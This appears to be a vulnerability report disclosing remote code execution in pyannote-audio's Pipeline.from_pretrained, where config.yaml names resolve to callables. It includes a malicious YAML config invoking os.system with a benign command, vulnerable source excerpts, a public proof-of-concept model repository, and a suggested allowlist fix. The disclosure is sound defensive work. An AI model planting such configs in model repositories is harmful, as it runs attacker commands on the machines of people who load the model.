Tested versions
version <= 4.0.4
System information
Ubuntu 24.04.2 - pyannote-audio 4.0.4
Issue description
Description
pyannote-audio allows Pipeline.from_pretrained(...) to read a remote config.yaml and instantiate Python callables directly from strings inside that configuration. In particular, the preprocessors section supports a name field that is resolved to a Python object and then called with attacker-controlled parameters. As a result, a malicious model repository can name an arbitrary callable such as os.system in its config and have it executed during pipeline loading.
For example, an attacker can publish a config like:
```yaml
preprocessors:
  key:
    name: os.system
    params:
      command: "echo HACKED && touch /tmp/hacked.txt"
```
When a victim loads the pipeline from that repository, the library resolves os.system and executes it with the supplied arguments. This leads to arbitrary command execution on the victim host during normal model loading.
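The danger comes from the fact that any importable dotted name can be turned into a live callable. The following is a minimal sketch of how such resolution behaves in general (an illustration, not pyannote.audio's actual get_class_by_name implementation):

```python
import importlib

def resolve_dotted_name(dotted: str):
    """Resolve a dotted path such as "os.system" to a live Python object.

    Illustrative sketch only: pyannote.audio's real resolver
    (get_class_by_name) differs in detail, but the core mechanism
    (import the module, then fetch the attribute) is the same idea.
    """
    module_name, _, attr = dotted.rpartition(".")
    module = importlib.import_module(module_name)
    return getattr(module, attr)
```

With this mechanism, resolving the string "os.system" yields the real os.system function, ready to be called with whatever arguments the config supplies.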
Root Cause
The vulnerable code in Pipeline.from_pretrained reads preprocessors from the remote config and dynamically resolves and instantiates the specified callable:
pyannote-audio/src/pyannote/audio/core/pipeline.py (lines 263 to 277 at commit 78c0d16):

```python
if "preprocessors" in config:
    preprocessors = {}
    for key, preprocessor in config.get("preprocessors", {}).items():
        # preprocessors:
        #    key:
        #       name: package.module.ClassName
        #       params:
        #          param1: value1
        #          param2: value2
        if isinstance(preprocessor, dict):
            Klass = get_class_by_name(
                preprocessor["name"], default_module_name="pyannote.audio"
            )
            params = preprocessor.get("params", {})
            preprocessors[key] = Klass(**params)
```
This is unsafe because preprocessor["name"] is attacker-controlled. If it is set to os.system, then get_class_by_name(...) resolves it and Klass(**params) becomes equivalent to executing:
```python
os.system(command="echo HACKED && touch /tmp/hacked.txt")
```
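To see why Klass(**params) amounts to running the attacker's command, the same call shape can be reproduced with a harmless stand-in (fractions.Fraction takes the place of os.system here, so the demo has no side effects):

```python
from fractions import Fraction

# Harmless stand-in: in the real attack, Klass is os.system and params is
# {"command": "echo HACKED && touch /tmp/hacked.txt"}.
Klass = Fraction
params = {"numerator": 3, "denominator": 4}  # attacker-controlled kwargs
instance = Klass(**params)  # same call shape as os.system(command=...)
```

Nothing about the call site distinguishes "instantiate a preprocessor class" from "invoke an arbitrary function": the keyword-argument expansion happens identically in both cases.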
The same pattern also appears in pipeline initialization:
pyannote-audio/src/pyannote/audio/core/pipeline.py (lines 237 to 245 at commit 78c0d16):

```python
# initialize pipeline
pipeline_name = config["pipeline"]["name"]
Klass = get_class_by_name(
    pipeline_name, default_module_name="pyannote.pipeline.blocks"
)
params = config["pipeline"].get("params", {})
params.setdefault("token", token)
params.setdefault("cache_dir", cache_dir)
pipeline = Klass(**params)
```
This creates a similar risk. Although this path automatically adds token and cache_dir, it still allows attacker-controlled pipeline.name and pipeline.params. If an attacker can identify any callable reachable through get_class_by_name(...) that accepts attacker-controlled arguments and has dangerous side effects, this path can also be abused for code execution or other malicious actions.
The core security issue is that remote YAML configuration is being used to dynamically resolve and execute Python callables without a strict allowlist or an explicit trust boundary.
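One way to establish such a trust boundary is a namespace allowlist checked before any name is resolved. The following is a hypothetical sketch of that idea (illustrative only, not the library's actual fix; the prefix list is an assumption):

```python
# Hypothetical allowlist: only resolve names inside trusted namespaces.
ALLOWED_PREFIXES = ("pyannote.audio.", "pyannote.pipeline.")

def is_allowed(name: str, default_module: str = "pyannote.audio") -> bool:
    """Return True only if the (possibly bare) dotted name falls inside
    an allowed namespace; bare names inherit the default module, mirroring
    get_class_by_name's default_module_name behavior."""
    full_name = name if "." in name else f"{default_module}.{name}"
    return full_name.startswith(ALLOWED_PREFIXES)
```

With such a check in place, a config naming os.system would be rejected before import, while names inside the library's own packages would still resolve.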
Proof of Concept
I created a model repository on HuggingFace for demonstration: XManFromXlab/pyannote-audio-pipeline-RCE. A victim only needs to run the normal loading code:
```python
from pyannote.audio import Pipeline

model_id = "XManFromXlab/pyannote-audio-pipeline-RCE"
pipeline = Pipeline.from_pretrained(model_id)
```
During Pipeline.from_pretrained(...), the library parses config.yaml, resolves os.system through get_class_by_name(...), and immediately executes it with the attacker-supplied command argument. As a result, the victim host prints HACKED and creates /tmp/hacked.txt, demonstrating arbitrary command execution.